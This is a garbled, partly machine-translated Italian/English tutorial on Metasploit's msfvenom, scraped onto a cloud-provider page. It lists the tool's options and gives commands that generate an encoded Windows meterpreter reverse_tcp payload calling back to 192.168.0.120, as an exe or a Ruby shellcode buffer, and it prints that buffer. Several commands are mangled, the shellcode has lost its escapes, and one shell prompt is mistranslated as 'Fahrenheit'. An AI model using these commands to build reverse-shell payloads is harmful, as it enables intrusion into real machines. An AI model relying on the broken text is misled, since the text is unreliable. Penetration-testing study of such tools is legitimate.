Usage of Msfvenom in metasploit)

Source: Internet
Author: User

Options:
-P, -- payload [payload] Payload to use. Specify a '-' or stdin to use M payloads
-L, -- list [module_type] List a module type example: payloads, encoders, nops, all
-N, -- nopsled [length] Prepend a nopsled of [length] size on to the payload
-F, -- format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-E, -- encoder [encoder] The encoder to use
-A, -- arch [architecture] The architecture to use
-- Platform [platform]
The platform of the payload
-S, -- space [length] The maximum size of the resulting payload
-B, -- bad-chars [list] The list of characters to avoid example: 'x00xff'
-I, -- iterations [count] The number of times to encode the payload
-X, -- template [path] Specify a custom executable file to use as a template
-K, -- keep Preserve the template behavior and inject the payload as a new thread
-H, -- help Show this message
Msfvenom-p <PAYLOAD>-e <ENCODER>-f <format de sortie> nomdefichier
Eg:
Msfvenom-p windows/meterpreter/reverse_tcp-f raw-e x86/systlhost = <notre ip> | msfvenom-e x86/shikata_ga_nai-a x86-platform windows-f exe> meter.exe

Sul sito rapid7è stato anche fatto un esempio dell 'uso dello script, ovvilla creazione di un payload (reverse_tcp ):

Fahrenheit: msf3 bannedit $ msfvenom-p windows/meterpreter/reverse_tcp-f ruby-e-I 3-s 480 LHOST = 192.168.0.120
[*] X86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 371 (iteration = 3)
Buf =
"Xd9xf7xd9x74x24xf4xbbx9cxecxeax8ax5fx2bxc9" +
"Xb1x50x31x5fx18x03x5fx18x83xefx60x0ex1fx31" +
"X11xe0xa4x2axfbx23xfdxc7xdfx2fxa4x16xd6x61" +
"X10x68xb2x95x20x60xbex95x7cx65x55x40x38x01" +
"X4bx51x78x5fx1fx36xdex3bx99x8cxb2x11xb3x8d" +
"X2dx4cx66x7cxbdx02x0bxa6xa9x1ax32x65xcfx75" +
"Xe8x15x1ax62x5fx69xe1xddx90x2ex2ex40xe0xb7" +
"X8bx16xfex15xdcx34x4cx4ex18x18x03x46x22xff" +
"Xa8x9bxf0xd5x4fxe0xfdxabx71x6ex43x03xd5x28" +
"X07x29x5exadx8fxd8xafxbdx69x06xf1xd1x4ex9b" +
"X01x7dx5ax75x54x76x90xdbx5ex7bx97x37xa4xab" +
"X2dxe2x17x8excfx4bxd0x3fxefxc6xffxe5x1cxc3" +
"X99x04x15x2excex5ex16x86x5ax2fx62x0ax32xe5" +
"Xe1xa4xd3x32x92x13xfdxcfxb6xa2x8bx97xcexf8" +
"X27x12xb0x6fxb5xa8x91x30x2cx14x40x2fx43xd8" +
"X45x46xd0x4cx58x59x8dx78x47xb2xdax79x6cxfa" +
"X07x43x18xc4x07x0ex2fxd0x71x84xcbx1cxabx01" +
"Xb0x17xedx07x1bxb0xcfxd1x25xc1x9bx62x7cxac" +
"X43x2ex52x36xb1xfcx61xbcx0ex56xdcxe1x9dxc2" +
"X29x3fxe9xf3xb1xe2x72x77x99x4bxf3xfcx83xd2" +
"X19x6dx53x4cx64xa0xddx38x82x3dx15x66x38x96" +
"X39xb3xa4xe3xffx07xb7x8ax23xcaxc6xafx57x64" +
"X3dxf3x23x63x42x30x90x3bx67x26x81x24x61xc3" +
"Xe4x51x75x30x47xf8x15xcbx21xe9x2ax30x9dx04" +
"X28xe3x37xb0xa4xaax1exf3"

Questo crea un payload in formato ruby, con l' encoder shikata_ga_nai, scelto automaticamente dal rank degli encoder, -s 480 indica che l' output non deve essere maggiore di 480 byte e in fineLHOST = 192.168.0.120 setta la variabile LHOST per usarla con il Payload.

Ci viene fatto anche un confronto sow.l 'aspetto della velocit à d' esecuzione.
Il primo esempio mostra il tempo di esecuzione di Msfvenom, mentre il secondo quello di msfpayload emsfencode insieme:

Fahrenheit: msf3 bannedit $ time./msfvenom-p windows/meterpreter/reverse_tcp-e-I 3 LHOST = 192.168.0.120-f ruby 1>/dev/null
[*] X86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 371 (iteration = 3)
Real 0m2. 744 s
User 0m2. 380 s
Sys 0m0. 367 s
Fahrenheit: msf3 bannedit $ time./msfpayload windows/meterpreter/reverse_tcp LHOST = 192.168.0.120 R |./msfencode-c 3 1>/dev/null
[*] X86/shikata_ga_nai succeeded with size 321 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 348 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 375 (iteration = 3)
Real 0m3. 070 s
User 0m4. 227 s
Sys 0m0. 778 s

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.